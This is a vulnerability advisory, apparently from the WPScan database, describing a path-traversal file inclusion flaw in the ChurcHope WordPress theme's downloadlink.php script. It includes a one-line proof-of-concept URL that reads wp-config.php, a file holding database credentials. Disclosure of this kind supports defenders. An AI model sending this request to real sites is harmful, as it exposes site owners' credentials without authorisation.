ChurcHope Theme Local File Inclusion (LFI)

Sign up to our free email alerts service for instant vulnerability notifications!

Description
The vulnerability is caused by improper filtration of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible.
Proof of Concept
http://www.example.com/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php

Affects

Theme

References

URL http://www.compuhowto.com/security/lfi-in-wordpress-theme-churchope/

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Submitter Justin Smith
Views 766
Verified No
WPVDB ID 7710

Timeline

Added 2014-12-07 (about 2 years ago)
Last Updated 2016-06-19 (6 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.